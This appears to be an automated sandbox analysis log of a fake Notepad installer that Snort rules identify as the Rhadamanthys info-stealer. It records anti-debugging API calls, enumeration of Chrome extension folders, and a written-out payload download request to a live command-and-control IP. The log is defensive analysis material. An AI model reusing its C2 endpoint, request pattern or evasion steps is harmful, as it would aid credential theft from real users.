              Source: Binary string: kernelbase.pdb source: rundll32.exe, 00000001.00000003.269724498.0000025AA3818000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe; Code function: 0_2_00409BB0 FindFirstFileA, GetLastError, _errno, _errno, _errno, _errno, _errno, _errno, 0_2_00409BB0
Source: C:\Windows\System32\rundll32.exe; Code function: 1_2_00007DF4B3C1828C FindFirstFileW, FindNextFileW, 1_2_00007DF4B3C1828C
Source: C:\Windows\System32\rundll32.exe; Code function: 1_2_00007DF4B3C1782C FindFirstFileW, FindNextFileW, FindClose, 1_2_00007DF4B3C1782C
Source: C:\Windows\System32\rundll32.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\System32\rundll32.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\System32\rundll32.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\System32\rundll32.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\System32\rundll32.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\System32\rundll32.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

              Networking

Source: C:\Windows\System32\rundll32.exe; Network Connect: 164.90.172.224 80
Source: Traffic; Snort IDS: 2043202 ET TROJAN Rhadamanthys Stealer - Payload Download Request 192.168.2.3:49698 -> 164.90.172.224:80
Source: Traffic; Snort IDS: 2853001 ETPRO TROJAN Rhadamanthys Stealer - Payload Response 164.90.172.224:80 -> 192.168.2.3:49698
Source: Joe Sandbox View; ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: unknown; TCP traffic detected without corresponding DNS query: 164.90.172.224
              Source: rundll32.exe, 00000001.00000003.267749823.0000025AA3A20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http:///etc/puk.keyGET13ConnectionupgradeUpgradewebsocketUser-Agentcurl/5.9Sec-Websocket-KeySec-Webs
              Source: rundll32.exe, 00000001.00000003.319087648.0000025AA4151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267432488.0000025AA372E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http:///etc/puk.keyMachineGuidSOFTWARE
              Source: rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discord.com
              Source: rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discordapp.com
              Source: rundll32.exe, 00000001.00000003.300138024.0000025AA373B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro
              Source: rundll32.exe, 00000001.00000003.300138024.0000025AA373B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000002.320753776.0000025AA39CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6315198?product=
              Source: rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome?p=update_error
              Source: rundll32.exe, 00000001.00000003.300138024.0000025AA373B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome?p=update_errorFix
              Source: rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/installer/?product=
              Source: rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en_uk/chrome/
              Source: rundll32.exe, 00000001.00000003.300138024.0000025AA373B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en_uk/chrome/Google
              Source: rundll32.exe, 00000001.00000003.300183680.0000025AA39D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google
              Source: rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
              Source: rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=chrome&oq=chrome&aqs=chrome..69i57j0j5l3j69i60l3.2663j0j4&sourceid=c
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006F0927 memset,memset,WSARecv,GetLastError,WSAGetLastError,WSAGetLastError,WSAGetLastError,RegisterWaitForSingleObject,GetLastError,GetLastError,GetLastError,GetLastError
              Source: global traffic HTTP traffic detected: GET /blob/oo6nbv.a50a HTTP/1.1 Host: 164.90.172.224 User-Agent: curl/5.9 Connection: close X-CSRF-TOKEN: B8U+rHB9TVwXZpzczPGWeTEwduSJwDKoj9JZsKEJuBxyQjZw6jI0zuO5kLJUBJyXQCnlMeG+5ceQHdme90g2Dw== Cookie: CSRF-TOKEN=B8U+rHB9TVwXZpzczPGWeTEwduSJwDKoj9JZsKEJuBxyQjZw6jI0zuO5kLJUBJyXQCnlMeG+5ceQHdme90g2Dw==; LANG=en-US
              Source: global traffic HTTP traffic detected: GET /blob/oo6nbv.a50a HTTP/1.1 Host: 164.90.172.224 User-Agent: curl/5.9 Upgrade: websocket Connection: upgrade Sec-Websocket-Version: 13 Sec-Websocket-Key: JK0eGt0EctZUUaP
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244960679.0000000002835000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DirectInput8Create
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.249955394.0000000000710000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: NtUserGetRawInputData
              Source: Yara match File source: 0.3.Notteppad_SettupX32iX64.exe.2a20000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000000.00000003.245144448.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000003.244960679.0000000002835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.269724498.0000025AA3818000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: Notteppad_SettupX32iX64.exe PID: 5280, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5152, type: MEMORYSTR
              Source: Notteppad_SettupX32iX64.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5152 -s 272
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_004076F0
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_00402446
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_00404120
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_004041D0
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_00404207
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_00404218
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_00402E30
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006EA0E7
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006EE4FC
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006E20C6
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006ECA74
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007FFC288E1620
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007FFC288E5D39
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007FFC288E48F0
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007FFC288EDCE0
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007FFC288EFA60
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007FFC288EB1F0
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007FFC288ED810
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007FFC288F0430
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_0000025AA36022B3
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_0000025AA3605994
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_0000025AA360455C
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_0000025AA3601968
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_0000025AA3602558
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_0000025AA36029F8
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_0000025AA3605094
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_0000025AA3605414
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C18718
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C136A0
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C115E4
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C41224
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C4B0C8
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C78090
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C6673C
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C53754
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C836E8
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C8A698
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C0D608
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C475A8
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C4D558
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C01530
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C984C4
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C4A3F4
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C003D8
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3CA5B3C
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C49B34
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C8EB34
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C86AA0
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C4C9FC
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C64A18
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C199F0
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3CA9964
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C41900
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C6F864
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C19828
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C4B77C
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C7AE88
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C40E98
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C0FE38
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C26E60
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C60DF0
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3CC2DE4
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C99D58
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C5BC88
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C41C4C
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C40C58
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C03C68
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: String function: 006EC944 appears 50 times
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_004029FB GetModuleHandleW,strlen,GetProcessHeap,HeapFree,NtProtectVirtualMemory
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006E5F12 GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006E93CE lstrlenW,NtOpenDirectoryObject,calloc,calloc,NtQueryDirectoryObject,calloc,memcpy,??3@YAXPAX@Z
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006E4016 NtQueryInformationProcess
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006E9963 GetCurrentProcess,GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcess,NtQueryInformationProcess
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006E6977 GetCurrentProcess,NtQueryInformationProcess,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,VariantInit,VariantInit,VariantInit,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006E9932 GetCurrentProcess,NtQueryInformationProcess
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006E99F7 _alloca_probe,NtCreateDebugObject,CloseHandle
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006E99C6 GetCurrentProcess,NtQueryInformationProcess
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006E9601 NtClose
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006E9AB8 GetCurrentThread,GetCurrentThread,NtSetInformationThread,NtSetInformationThread,GetCurrentThread,NtSetInformationThread,GetCurrentThread,NtQueryInformationThread,GetCurrentThread,NtQueryInformationThread,GetCurrentThread,NtQueryInformationThread
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006E9A8B NtQuerySystemInformation
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006E3F5F NtQuerySystemInformation,NtQuerySystemInformation,malloc,NtQuerySystemInformation,GetCurrentProcess,GetCurrentProcess,lstrcmpiW,OpenProcess,GetCurrentProcess,CloseHandle,??3@YAXPAX@Z
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C22FA4 NtUnmapViewOfSection,VirtualAlloc,NtSetInformationFile,NtClose
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C22834 NtQuerySystemInformation
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C22E88 NtOpenFile
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.250519069.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCOMBASE.DLLj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245144448.0000000002BD2000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameKernelbase.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.249955394.0000000000724000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWin32u.DLLj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260789377.0000000002833000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWindows.Storage.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244109715.000000000261D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004F60000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSHELL32.DLLj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.246455497.000000000297A000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamegdi32j% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253137591.000000000262A000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameOLEAUT32.DLLj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248888902.000000000250B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameuser32j% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244960679.0000000002835000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NSC_NameNSC_AddressNSC_PhoneNSC_EmailNSC_DescriptionWM/WriterWM/ConductorWM/ProducerWM/DirectorWM/ContentGroupDescriptionWM/SubTitleWM/PartOfSetWM/ProtectionTypeWM/VideoHeightWM/VideoWidthWM/VideoFrameRateWM/MediaClassPrimaryIDWM/MediaClassSecondaryIDWM/PeriodWM/CategoryWM/PictureWM/Lyrics_SynchronisedWM/OriginalLyricistWM/OriginalArtistWM/OriginalAlbumTitleWM/OriginalReleaseYearWM/OriginalFilenameWM/PublisherWM/EncodedByWM/EncodingSettingsWM/EncodingTimeWM/AuthorURLWM/UserWebURLWM/AudioFileURLWM/AudioSourceURLWM/LanguageWM/ParentalRatingWM/BeatsPerMinuteWM/InitialKeyWM/MoodWM/TextWM/DVDIDWM/WMContentIDWM/WMCollectionIDWM/WMCollectionGroupIDWM/UniqueFileIdentifierWM/ModifiedByWM/RadioStationNameWM/RadioStationOwnerWM/PlaylistDelayWM/CodecWM/DRMWM/ISRCWM/ProviderWM/ProviderRatingWM/ProviderStyleWM/ContentDistributorWM/SubscriptionContentIDWM/WMADRCPeakReferenceWM/WMADRCPeakTargetWM/WMADRCAverageReferenceWM/WMADRCAverageTargetWM/StreamTypeInfoWM/PeakBitrateWM/ASFPacketCountWM/ASFSecurityObjectsSizeWM/SharedUserRatingWM/SubTitleDescriptionWM/MediaCreditsWM/ParentalRatingReasonWM/OriginalReleaseTimeWM/MediaStationCallSignWM/MediaStationNameWM/MediaNetworkAffiliationWM/MediaOriginalChannelWM/MediaIsStereoWM/MediaOriginalBroadcastDateTimeWM/VideoClosedCaptioningWM/MediaIsRepeatWM/MediaIsLiveWM/MediaIsTapeWM/MediaIsDelayWM/MediaIsSubtitledWM/MediaIsPremiereWM/MediaIsFinaleWM/MediaIsSAPWM/ProviderCopyrightWM/ISANWM/ADIDWM/WMShadowFileSourceFileTypeWM/WMShadowFileSourceDRMTypeWM/WMCPDistributorWM/WMCPDistributorIDWM/SeasonNumberWM/EpisodeNumberEarlyDataDeliveryJustInTimeDecodeSingleOutputBufferSoftwareScalingDeliverOnReceiveScrambledAudioDedicatedDeliveryThreadEnableDiscreteOutputSpeakerConfigDynamicRangeControlAllowInterlacedOutputVideoSampleDurationsStreamLanguageEnableWMAProSPDIFOutputDeinterlaceModeInterlacedCodi
ngInitialPatternForInverseTelecineJPEGCompressionQualityWatermarkCLSIDWatermarkConfigFixedFrameRate_SOURCEFORMATTAG_ORIGINALWAVEFORMAT_EDL_COMPLEXITYEX_DECODERCOMPLEXITYPROFILEReloadIndexOnSeekStreamNumIndexObjectsFailSeekOnErrorPermitSeeksBeyondEndOfStreamUsePacketAtSeekPointSourceBufferTimeSourceMaxBytesAtOnce_VBRENABLED_VBRQUALITY_RMAX_BMAXVBR PeakBuffer Average_COMPLEXITYEXMAX_COMPLEXITYEXOFFLINE_COMPLEXITYEXLIVE_ISVBRSUPPORTED_PASSESUSEDMusicSpeechClassModeMusicClassModeSpeechClassModeMixedClassModeSpeechFormatCapPeakValueAverageLevelFold6To2Channels3Fold%luTo%luChannels%luDeviceConformanceTemplateEnableFrameInterpolationNeedsPreviousSampleWM/IsCompilation| vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244960679.0000000002835000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameKernelbase.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.244881244.0000000002660000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamekernel32j% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.250112415.000000000283E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCOMBASE.DLLj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245960559.0000000000718000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamecryptbase.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245144448.0000000002A20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: NSC_NameNSC_AddressNSC_PhoneNSC_EmailNSC_DescriptionWM/WriterWM/ConductorWM/ProducerWM/DirectorWM/ContentGroupDescriptionWM/SubTitleWM/PartOfSetWM/ProtectionTypeWM/VideoHeightWM/VideoWidthWM/VideoFrameRateWM/MediaClassPrimaryIDWM/MediaClassSecondaryIDWM/PeriodWM/CategoryWM/PictureWM/Lyrics_SynchronisedWM/OriginalLyricistWM/OriginalArtistWM/OriginalAlbumTitleWM/OriginalReleaseYearWM/OriginalFilenameWM/PublisherWM/EncodedByWM/EncodingSettingsWM/EncodingTimeWM/AuthorURLWM/UserWebURLWM/AudioFileURLWM/AudioSourceURLWM/LanguageWM/ParentalRatingWM/BeatsPerMinuteWM/InitialKeyWM/MoodWM/TextWM/DVDIDWM/WMContentIDWM/WMCollectionIDWM/WMCollectionGroupIDWM/UniqueFileIdentifierWM/ModifiedByWM/RadioStationNameWM/RadioStationOwnerWM/PlaylistDelayWM/CodecWM/DRMWM/ISRCWM/ProviderWM/ProviderRatingWM/ProviderStyleWM/ContentDistributorWM/SubscriptionContentIDWM/WMADRCPeakReferenceWM/WMADRCPeakTargetWM/WMADRCAverageReferenceWM/WMADRCAverageTargetWM/StreamTypeInfoWM/PeakBitrateWM/ASFPacketCountWM/ASFSecurityObjectsSizeWM/SharedUserRatingWM/SubTitleDescriptionWM/MediaCreditsWM/ParentalRatingReasonWM/OriginalReleaseTimeWM/MediaStationCallSignWM/MediaStationNameWM/MediaNetworkAffiliationWM/MediaOriginalChannelWM/MediaIsStereoWM/MediaOriginalBroadcastDateTimeWM/VideoClosedCaptioningWM/MediaIsRepeatWM/MediaIsLiveWM/MediaIsTapeWM/MediaIsDelayWM/MediaIsSubtitledWM/MediaIsPremiereWM/MediaIsFinaleWM/MediaIsSAPWM/ProviderCopyrightWM/ISANWM/ADIDWM/WMShadowFileSourceFileTypeWM/WMShadowFileSourceDRMTypeWM/WMCPDistributorWM/WMCPDistributorIDWM/SeasonNumberWM/EpisodeNumberEarlyDataDeliveryJustInTimeDecodeSingleOutputBufferSoftwareScalingDeliverOnReceiveScrambledAudioDedicatedDeliveryThreadEnableDiscreteOutputSpeakerConfigDynamicRangeControlAllowInterlacedOutputVideoSampleDurationsStreamLanguageEnableWMAProSPDIFOutputDeinterlaceModeInterlacedCodi
ngInitialPatternForInverseTelecineJPEGCompressionQualityWatermarkCLSIDWatermarkConfigFixedFrameRate_SOURCEFORMATTAG_ORIGINALWAVEFORMAT_EDL_COMPLEXITYEX_DECODERCOMPLEXITYPROFILEReloadIndexOnSeekStreamNumIndexObjectsFailSeekOnErrorPermitSeeksBeyondEndOfStreamUsePacketAtSeekPointSourceBufferTimeSourceMaxBytesAtOnce_VBRENABLED_VBRQUALITY_RMAX_BMAXVBR PeakBuffer Average_COMPLEXITYEXMAX_COMPLEXITYEXOFFLINE_COMPLEXITYEXLIVE_ISVBRSUPPORTED_PASSESUSEDMusicSpeechClassModeMusicClassModeSpeechClassModeMixedClassModeSpeechFormatCapPeakValueAverageLevelFold6To2Channels3Fold%luTo%luChannels%luDeviceConformanceTemplateEnableFrameInterpolationNeedsPreviousSampleWM/IsCompilation| vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253075899.0000000002508000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameOLEAUT32.DLLj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.255267191.0000000000726000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamempr.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.251971029.0000000002503000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameOLE32.DLLj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.249465359.00000000028CB000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameuser32j% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.259962474.0000000002508000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSHCORE.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.251663261.000000000072C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameimm32j% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.247436363.0000000000D37000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp_win.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.246110906.0000000002585000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamegdi32j% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000002.273050542.00000000027BF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245915259.0000000000710000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesecurity.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245378880.0000000000D2B000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameadvapi32.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: LInternalNameOriginalFileNameProductNameProductVersionCompanyNameLegalCopyrightLegalTrademarksPlatform vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: LInternalNameOriginalFileNameProductNameProductVersionCompanyNameLegalCopyrightLegalTrademarksPlatform vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.264610622.00000000035F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemswsock.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245765521.0000000002501000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamerpcrt4.dllj% vs Notteppad_SettupX32iX64.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245563996.0000000002688000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcrt.dllj% vs Notteppad_SettupX32iX64.exe
